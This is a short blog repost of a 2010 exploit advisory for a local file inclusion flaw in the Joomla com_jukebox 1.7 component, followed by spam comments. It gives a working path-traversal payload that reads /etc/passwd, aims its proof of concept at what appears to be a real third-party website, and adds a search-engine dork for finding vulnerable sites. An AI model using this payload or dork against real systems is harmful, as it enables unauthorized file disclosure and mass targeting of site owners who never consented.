Joomla Component Juke Box LFI Vuln

on April 06, 2010

[o] Joomla Component Juke Box Local File Inclusion Vulnerability
Software : com_jukebox version 1.7
Vendor : http://www.jooforge.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]

[o] PoC
http://www.livequrantutors.com/app/index.php?option=com_jukebox&controller=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
inurl:"com_jukebox"

Comments

labatterie said…

I hope u answer as soon as u can...

December 3, 2010 at 1:49 PM

sohail said…

Online Quran Academy: The Best Online Quran Learning Institute. Online Quran Teaching, Quran reading, Quran Tutoring. Quran Academy, EQuran, Online Quran Tut courses

December 5, 2011 at 11:05 PM

ALQuran said…

ALQuran Classes USA Academy!
We offer online quran classes for kids, adults, and ladies. No matter where you are you can easily take our online quran clases for everyone and anytime.
Get our free trial classes online:
free trial classes

September 24, 2024 at 6:38 PM

Research Blog

Search This Blog

LFI to RCE via access_log injection

Joomla Component Juke Box LFI Vuln

Comments